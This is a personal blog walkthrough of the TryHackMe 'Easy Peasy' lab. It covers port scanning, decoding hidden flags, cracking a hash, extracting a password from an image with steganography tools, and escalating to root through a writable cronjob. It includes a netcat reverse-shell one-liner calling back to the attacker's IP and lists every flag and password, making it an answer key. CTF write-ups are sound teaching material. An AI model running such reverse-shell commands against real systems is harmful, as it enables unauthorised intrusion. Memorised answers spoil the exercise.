CarlosPadilla
WALKTHROUGHNov 13, 2023

Easy Peasy — THM WriteUp

Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.

Easy Peasy — THM WriteUp

Enumeration through Nmap

Nmap:

└─$ sudo nmap -p- 10.10.135.13 -vvv -sCV -T4
...
80/tcp    open  http    syn-ack ttl 63 nginx 1.16.1
|_http-title: Welcome to nginx!
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.16.1
| http-methods: 
|_  Supported Methods: GET HEAD
6498/tcp  open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
...
65524/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.43 ((Ubuntu))
|_http-title: Apache2 Debian Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.43 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/

Q1. How many ports are open?

Answer: 3

Q2. What is the version of nginx?

Answer: 1.16.1

Q3. What is running on the highest port?

Answer: Apache


Compromising the machine

Q4. Using GoBuster, find flag 1

When reading the code on the page: hidden/whatever/, we will find a hash located in b64:

Answer: flag{f1rs7_fl4g}

Q5. Further enumerate the machine, what is flag 2?

Answer: flag{1m_s3c0nd_fl4g}

Q6. Crack the hash with easypeasy.txt, What is the flag 3?

When we read the code of the apache home page we find:

> <p hidden>its encoded with ba….:ObsJmP173N2X6dOrAgEAL0Vu</p> and Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}

Answer: flag{9fdafbd64c47471a8f54cd3fc64cd312}

Q7. What is the hidden directory?

By decrypting the other code found in Q6. we will find the hidden directory

Answer: /n0th1ng3ls3m4tt3r

Q8. Using the wordlist that provided to you in this task crack the hash what is the password?

> Hint: GOST Hash john — wordlist=easypeasy.txt — format=gost hash (optional* Delete duplicated lines,Compare easypeasy.txt to rockyou.txt and delete same words)

Download the “Task Files

Answer: mypasswordforthatjob

Q9. What is the password to login to the machine via SSH?

If you look at the source code of all the pages, all the images are imported by url, except for binarycodepixabay.jpg

$ steghide --info binarycodepixabay.jpg
"binarycodepixabay.jpg":
  formato: jpeg
  capacidad: 4,6 KB
�Intenta informarse sobre los datos adjuntos? (s/n) s
Anotar salvoconducto: ?                                                                                                                ...
...
$ stegseek --seed binarycodepixabay.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found (possible) seed: "8befc6a9"             
 Plain size: 297.0 Byte(s) (compressed)
 Encryption Algorithm: none
 Encryption Mode:      cbc
[i] Original filename: "secrettext.txt".
[i] Extracting to "binarycodepixabay.jpg.out".

Answer: iconvertedmypasswordtobinary

Q10. What is the user flag?

Answer: flag{n0wits33msn0rm4l}

Q11. What is the root flag?

When running linenum, we find that we have a root cronjob where you can write:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.18.68.6 1014 >/tmp/f

Answer: flag{63a9f0ea7bb98050796b649e85481845}


<3 Carlos

HomeBlogContactLinkedIn

Based in Almería, Spain — 00:00:00 UTC

© 2026 Carlos Padilla. All rights reserved.

Carlos Padilla